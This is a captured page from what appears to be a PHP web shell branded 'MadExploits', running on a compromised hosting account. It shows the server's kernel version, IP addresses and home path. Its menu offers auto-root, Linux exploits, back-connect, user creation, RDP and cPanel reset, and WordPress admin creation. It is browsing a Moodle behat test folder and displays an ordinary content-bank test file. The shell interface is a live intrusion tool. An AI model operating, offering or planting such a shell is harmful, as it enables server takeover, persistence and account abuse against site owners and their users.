Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.130.22
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
contentbank /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
access_permissions.feature
1.07
KB
-rw-r--r--
delete_content.feature
3.51
KB
-rw-r--r--
download_content.feature
3.21
KB
-rw-r--r--
edit_content.feature
9.98
KB
-rw-r--r--
events.feature
3.24
KB
-rw-r--r--
search_content.feature
2.7
KB
-rw-r--r--
sort_content.feature
2.95
KB
-rw-r--r--
view_preferences.feature
1.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : events.feature
@core @core_contentbank @_file_upload @_switch_iframe @javascript Feature: Confirm content bank events are triggered In order to log content bank actions As an admin I need to be able to check triggered events Background: And the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "contentbank content" exist: | contextlevel | reference | contenttype | user | contentname | | Course | C1 | contenttype_h5p | admin | Existing | And I log in as "admin" And I follow "Manage private files..." And I upload "h5p/tests/fixtures/filltheblanks.h5p" file to "Files" filemanager And I click on "Save changes" "button" And I am on "Course 1" course homepage with editing mode on And I add the "Navigation" block if not present Scenario: Content created and uploaded events when uploading a content file Given I navigate to "Reports > Live logs" in site administration And I should not see "Content uploaded" And I should not see "Content created" And I am on "Course 1" course homepage And I expand "Site pages" node And I click on "Content bank" "link" When I click on "Upload" "link" And I click on "Choose a file..." "button" And I click on "Private files" "link" in the ".fp-repo-area" "css_element" And I click on "filltheblanks.h5p" "link" And I click on "Select this file" "button" And I click on "Save changes" "button" And I navigate to "Reports > Live logs" in site administration Then I should see "Content uploaded" And I should see "Content created" Scenario: Content viewed event Given I navigate to "Reports > Live logs" in site administration And I should not see "Content viewed" And I am on "Course 1" course homepage And I expand "Site pages" node And I click on "Content bank" "link" When I click on "Existing" "link" And I navigate to "Reports > Live logs" in site administration Then I should see "Content viewed" Scenario: Content deleted event Given I navigate to "Reports > Live logs" in site administration And I should not see "Content deleted" And I am on "Course 1" course homepage And I expand "Site pages" node And I click on "Content bank" "link" And I click on "Existing" "link" And I open the action menu in "region-main-settings-menu" "region" When I choose "Delete" in the open action menu And I click on "Delete" "button" in the "Delete content" "dialogue" And I navigate to "Reports > Live logs" in site administration Then I should see "Content deleted" Scenario: Content updated event when renaming Given I navigate to "Reports > Live logs" in site administration And I should not see "Content updated" And I am on "Course 1" course homepage And I expand "Site pages" node And I click on "Content bank" "link" And I click on "Existing" "link" And I open the action menu in "region-main-settings-menu" "region" When I choose "Rename" in the open action menu And I set the field "Content name" to "New name" And I click on "Rename" "button" And I navigate to "Reports > Live logs" in site administration Then I should see "Content updated"
Close